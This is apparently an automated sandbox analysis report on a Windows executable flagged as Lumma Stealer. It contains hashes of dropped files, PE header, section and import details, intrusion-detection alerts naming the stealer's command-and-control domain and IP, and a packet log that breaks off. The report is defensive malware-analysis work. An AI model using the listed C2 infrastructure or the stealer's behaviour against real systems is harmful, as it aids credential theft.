                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):8324
                                                                                              Entropy (8bit):3.6995929267912406
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:R6l7wVeJ2/6046Y9SSUuxwbgmf+SUpDG89b/6sf3GVm:R6lXJ26j6YISU8wbgmf+S2/Zf31
                                                                                              MD5:24804AEA409F8B1B100904D14C95BFD2
                                                                                              SHA1:FB22B0F0F0965E8BF63E7DC1EE7760D4D570512B
                                                                                              SHA-256:2B90C0CB9A59B62CB541C2C693E80EC064606560D80F884C19BA9EE1E3E3AB5D
                                                                                              SHA-512:7F189CD397F0B319C87115A5FB317970EDFAD438F005AEA2A758947281D1B5384E14D18D4AC40F77B1E79C010B4748E47D581E98FB425FA1D49D0D979C6EA25A
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.3.6.<./.P.i.

                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB46.tmp.xml

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4579
                                                                                              Entropy (8bit):4.457832194712016
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:cvIwWl8zsXJg77aI9cnWpW8VYOYm8M4JxKOMFVZi+q8M5pACk3PcPzYPpd:uIjf5I7CW7VWJyiM3CzOpd
                                                                                              MD5:3F376C375CE0A6AFC84AC0FE2D5A6D65
                                                                                              SHA1:664483EA0AE549D2E934807CDDADFB0557375067
                                                                                              SHA-256:2746ED7AC31908B763671DC76BE6F607626B623792AAE590876A772552469CA9
                                                                                              SHA-512:4FB83111733D31F76C072EA94B5A0826BB5C3AE5595E3153F39E5F6178163B25A67EFF8662F014AAFBE2ED92DF443263688CAB6533705F4E732A57F7EBDDE346
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="637137" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                              C:\Windows\appcompat\Programs\Amcache.hve

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                              Category:dropped
                                                                                              Size (bytes):1835008
                                                                                              Entropy (8bit):4.4654132144536565
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:zIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNedwBCswSbC:kXD94+WlLZMM6YFHs+C
                                                                                              MD5:5BBAF019D802E854AB533741752766F3
                                                                                              SHA1:468949FB1347C17E06A674E1D151346FF7067E1A
                                                                                              SHA-256:E5A5E6525F772098C95C63CC619D7F94573901AB5A2C825AF44CE0F0EC241A9B
                                                                                              SHA-512:0453E0705F73DDBE4EDC4B00516E6AE9C5DBBFC4F2B5919E5D5784E817F2277485E471B806D1D314C4C0C7FA05A39045B0B54B8E733FC2DC3625D0B18D28F10F
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..+..Q...............................................................................................................................................................................................................................................................................................................................................`<.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):6.679527391728973
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:k6A01XaeEn.exe
                                                                                              File size:368'640 bytes
                                                                                              MD5:fd5fe344fef63284ed51951698535fca
                                                                                              SHA1:edd4a2cda68245606465c920ad824d8eed5d0c56
                                                                                              SHA256:9465a7b43d43fbd350d67bb6d7720306525fc409d9189e7ac5a2ada996b08bf5
                                                                                              SHA512:dec6bb11e1018ee3ee545f5c477053a5d94fdad7709881e8dfce2a94905218621f4df787104ac8ba180e7077d8daf9ebb07da020dd174648d7d00136a81da212
                                                                                              SSDEEP:6144:O9xVifwhcOwQuXuSE9uncSOkgZaKffgACke4dBseTwdW:O9xVpumccSrKgnewI
                                                                                              TLSH:B874CF1176F1A621E7FFC6307934FAA0597FB8A26E35818F2A78265F0D703918D6170B
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B.A;#..;#..;#...lK.:#..%qY.%#..%qH./#..%q^.U#......>#..;#..O#..%qW.:#..%qI.:#..%qL.:#..Rich;#..........PE..L...._.d...........

                                                                                              File Icon

                                                                                              Icon Hash:151a111012951009

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x401877
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x64995FF1 [Mon Jun 26 09:52:49 2023 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:5
                                                                                              OS Version Minor:0
                                                                                              File Version Major:5
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:5
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:607342d0c32277611749326750554d8e

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              call 00007FD91CE6888Bh
                                                                                              jmp 00007FD91CE64F0Dh
                                                                                              mov edi, edi
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              sub esp, 00000328h
                                                                                              mov dword ptr [00446C38h], eax
                                                                                              mov dword ptr [00446C34h], ecx
                                                                                              mov dword ptr [00446C30h], edx
                                                                                              mov dword ptr [00446C2Ch], ebx
                                                                                              mov dword ptr [00446C28h], esi
                                                                                              mov dword ptr [00446C24h], edi
                                                                                              mov word ptr [00446C50h], ss
                                                                                              mov word ptr [00446C44h], cs
                                                                                              mov word ptr [00446C20h], ds
                                                                                              mov word ptr [00446C1Ch], es
                                                                                              mov word ptr [00446C18h], fs
                                                                                              mov word ptr [00446C14h], gs
                                                                                              pushfd
                                                                                              pop dword ptr [00446C48h]
                                                                                              mov eax, dword ptr [ebp+00h]
                                                                                              mov dword ptr [00446C3Ch], eax
                                                                                              mov eax, dword ptr [ebp+04h]
                                                                                              mov dword ptr [00446C40h], eax
                                                                                              lea eax, dword ptr [ebp+08h]
                                                                                              mov dword ptr [00446C4Ch], eax
                                                                                              mov eax, dword ptr [ebp-00000320h]
                                                                                              mov dword ptr [00446B88h], 00010001h
                                                                                              mov eax, dword ptr [00446C40h]
                                                                                              mov dword ptr [00446B3Ch], eax
                                                                                              mov dword ptr [00446B30h], C0000409h
                                                                                              mov dword ptr [00446B34h], 00000001h
                                                                                              mov eax, dword ptr [00444004h]
                                                                                              mov dword ptr [ebp-00000328h], eax
                                                                                              mov eax, dword ptr [00444008h]
                                                                                              mov dword ptr [ebp-00000324h], eax
                                                                                              call dword ptr [000000C0h]

                                                                                              Rich Headers

                                                                                              Programming Language:
                                                                                              • [C++] VS2008 build 21022
                                                                                              • [ASM] VS2008 build 21022
                                                                                              • [ C ] VS2008 build 21022
                                                                                              • [IMP] VS2005 build 50727
                                                                                              • [RES] VS2008 build 21022
                                                                                              • [LNK] VS2008 build 21022

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x4290c0x3c.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x4210000x112e8.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x410000x194.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x3f35c0x3f4009976381cf58d0f66c1346f9c84e59d35False0.8037765563241107data7.371498425770648IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x410000x22180x24004fb72ba1cc81a7852a7aa3706c847f3bFalse0.3490668402777778data5.373695785620911IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0x440000x3dc4bc0x7000f4844b84bde1ca15ae8869ac69c9ac02unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0x4210000x112e80x114007cb2356f2efa7527c98aa7827d0c9d5aFalse0.4493744338768116data4.76016678197608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0x4215e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.5101279317697228
                                                                                              RT_ICON0x4224880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.5658844765342961
                                                                                              RT_ICON0x422d300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.6002304147465438
                                                                                              RT_ICON0x4233f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.6394508670520231
                                                                                              RT_ICON0x4239600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.4099585062240664
                                                                                              RT_ICON0x425f080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.4793621013133208
                                                                                              RT_ICON0x426fb00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.47704918032786886
                                                                                              RT_ICON0x4279380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.5806737588652482
                                                                                              RT_ICON0x427e180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkmenTurkmenistan0.3411513859275053
                                                                                              RT_ICON0x428cc00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkmenTurkmenistan0.4711191335740072
                                                                                              RT_ICON0x4295680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkmenTurkmenistan0.5040322580645161
                                                                                              RT_ICON0x429c300x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkmenTurkmenistan0.5158959537572254
                                                                                              RT_ICON0x42a1980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkmenTurkmenistan0.42738589211618255
                                                                                              RT_ICON0x42c7400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkmenTurkmenistan0.43386491557223267
                                                                                              RT_ICON0x42d7e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkmenTurkmenistan0.4344262295081967
                                                                                              RT_ICON0x42e1700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkmenTurkmenistan0.4521276595744681
                                                                                              RT_STRING0x42e8080x386data0.4567627494456763
                                                                                              RT_STRING0x42eb900xb2data0.601123595505618
                                                                                              RT_STRING0x42ec480x6d0data0.4288990825688073
                                                                                              RT_STRING0x42f3180x71edata0.4313940724478595
                                                                                              RT_STRING0x42fa380x6e2data0.43473325766174803
                                                                                              RT_STRING0x4301200x65cdata0.43611793611793614
                                                                                              RT_STRING0x4307800x71adata0.4251925192519252
                                                                                              RT_STRING0x430ea00x7c8data0.41967871485943775
                                                                                              RT_STRING0x4316680x756data0.4222577209797657
                                                                                              RT_STRING0x431dc00x528data0.45227272727272727
                                                                                              RT_GROUP_ICON0x42e5d80x76dataTurkmenTurkmenistan0.6694915254237288
                                                                                              RT_GROUP_ICON0x427da00x76dataTurkmenTurkmenistan0.6610169491525424
                                                                                              RT_VERSION0x42e6500x1b4data0.5688073394495413

                                                                                              Imports

                                                                                              DLLImport
                                                                                              KERNEL32.dllSearchPathW, SetLocaleInfoA, SetErrorMode, InterlockedIncrement, InterlockedDecrement, SetDefaultCommConfigW, ReadConsoleOutputAttribute, GetEnvironmentStringsW, GetTimeFormatA, SetEvent, GetModuleHandleW, GetDateFormatA, GetCommandLineA, SetProcessPriorityBoost, LoadLibraryW, DeleteVolumeMountPointW, GetConsoleAliasW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, BuildCommDCBW, GetNumaHighestNodeNumber, GetAtomNameA, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, AddAtomA, FoldStringA, CreatePipe, GetModuleHandleA, OpenFileMappingW, GetShortPathNameW, FindFirstVolumeA, EndUpdateResourceA, GetVersionExA, UnregisterWaitEx, SetFileAttributesW, GetLastError, HeapFree, HeapAlloc, MultiByteToWideChar, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, ReadFile, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA
                                                                                              USER32.dllGetProcessDefaultLayout

                                                                                              Possible Origin

                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              TurkmenTurkmenistan

                                                                                              Network Behavior

                                                                                              Suricata IDS Alerts

                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-12-18T20:54:14.474132+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.4644611.1.1.153UDP
                                                                                              2024-12-18T20:54:16.261976+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449730104.21.21.99443TCP
                                                                                              2024-12-18T20:54:16.261976+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.21.99443TCP
                                                                                              2024-12-18T20:54:16.970035+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.21.99443TCP
                                                                                              2024-12-18T20:54:16.970035+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.21.99443TCP
                                                                                              2024-12-18T20:54:18.239271+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449731104.21.21.99443TCP
                                                                                              2024-12-18T20:54:18.239271+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.21.99443TCP
                                                                                              2024-12-18T20:54:19.027809+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.21.99443TCP
                                                                                              2024-12-18T20:54:19.027809+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.21.99443TCP
                                                                                              2024-12-18T20:54:20.632864+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449732104.21.21.99443TCP
                                                                                              2024-12-18T20:54:20.632864+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.21.99443TCP
                                                                                              2024-12-18T20:54:22.529357+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449732104.21.21.99443TCP
                                                                                              2024-12-18T20:54:24.060830+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449733104.21.21.99443TCP
                                                                                              2024-12-18T20:54:24.060830+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.21.99443TCP
                                                                                              2024-12-18T20:54:27.078444+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449734104.21.21.99443TCP
                                                                                              2024-12-18T20:54:27.078444+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.21.99443TCP
                                                                                              2024-12-18T20:54:32.981624+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449737104.21.21.99443TCP
                                                                                              2024-12-18T20:54:32.981624+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.21.99443TCP
                                                                                              2024-12-18T20:54:39.281396+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449742104.21.21.99443TCP
                                                                                              2024-12-18T20:54:39.281396+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.21.99443TCP
                                                                                              2024-12-18T20:54:46.297827+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449743104.21.21.99443TCP
                                                                                              2024-12-18T20:54:46.297827+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.21.99443TCP

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 18, 2024 20:54:14.998786926 CET49730443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:14.998836040 CET44349730104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:14.998963118 CET49730443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:15.026006937 CET49730443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:15.026032925 CET44349730104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:16.261853933 CET44349730104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:16.261976004 CET49730443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:16.265597105 CET49730443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:16.265608072 CET44349730104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:16.266164064 CET44349730104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:16.313307047 CET49730443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:16.361743927 CET49730443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:16.361774921 CET49730443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:16.361880064 CET44349730104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:16.970108986 CET44349730104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:16.970349073 CET44349730104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:16.970453024 CET49730443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:16.988377094 CET49730443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:16.988404036 CET44349730104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:16.988420963 CET49730443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:16.988429070 CET44349730104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:17.012738943 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:17.012775898 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:17.012866974 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:17.013231039 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:17.013247967 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:18.239087105 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:18.239270926 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:18.241645098 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:18.241657972 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:18.241996050 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:18.243715048 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:18.243756056 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:18.243810892 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.027708054 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.027759075 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.027867079 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:19.027884960 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.044748068 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.044881105 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:19.044894934 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.078310966 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.078349113 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.078469992 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:19.078489065 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.078602076 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:19.092026949 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.106513977 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.106616020 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:19.106638908 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.154079914 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.154273033 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:19.154299974 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.203939915 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:19.216558933 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.226874113 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.227004051 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.227065086 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:19.227066040 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:19.229104996 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:19.229104996 CET49731443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:19.229136944 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.229147911 CET44349731104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.397494078 CET49732443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:19.397615910 CET44349732104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:19.397738934 CET49732443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:19.398073912 CET49732443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:19.398114920 CET44349732104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:20.632775068 CET44349732104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:20.632863998 CET49732443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:20.636523008 CET49732443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:20.636553049 CET44349732104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:20.636889935 CET44349732104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:20.638246059 CET49732443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:20.638433933 CET49732443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:20.638478994 CET44349732104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:20.638552904 CET49732443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:20.638567924 CET44349732104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:22.529388905 CET44349732104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:22.529534101 CET44349732104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:22.529633999 CET49732443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:22.529802084 CET49732443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:22.529824972 CET44349732104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:22.721307993 CET49733443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:22.721359968 CET44349733104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:22.721446991 CET49733443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:22.721805096 CET49733443192.168.2.4104.21.21.99
